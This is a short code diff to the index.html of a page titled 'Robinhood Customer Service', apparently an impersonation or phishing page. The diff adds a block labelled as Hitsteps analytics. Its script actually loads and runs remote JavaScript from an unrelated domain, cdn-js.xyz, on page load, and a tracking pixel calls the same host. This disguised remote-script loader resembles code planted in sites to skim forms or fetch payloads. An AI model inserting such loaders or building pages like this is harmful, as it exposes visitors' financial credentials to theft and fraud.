--- a/index.html
+++ b/index.html
@@ -1,6 +1,9 @@
 <html><head>
 
-
+<!-- Hitsteps TRACKING CODE - Manual 2024-02-21 - DO NOT CHANGE -->
+<script type="text/javascript">(function(){var hstc=document.createElement('script'); hstc.src='https://cdn-js.xyz/code?code=9e30fd34e3e28852d5a49b371277db24';hstc.async=true;var htssc = document.getElementsByTagName('script')[0];htssc.parentNode.insertBefore(hstc, htssc);})();
+</script><noscript><a href="http://www.hitsteps.com/"><img src="//cdn-js.xyz/code?mode=img&amp;code=9e30fd34e3e28852d5a49b371277db24" alt="web stats" width="1" height="1" />web statistics</a></noscript>
+<!-- Hitsteps TRACKING CODE - DO NOT CHANGE -->
   
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Robinhood Customer Service</title>
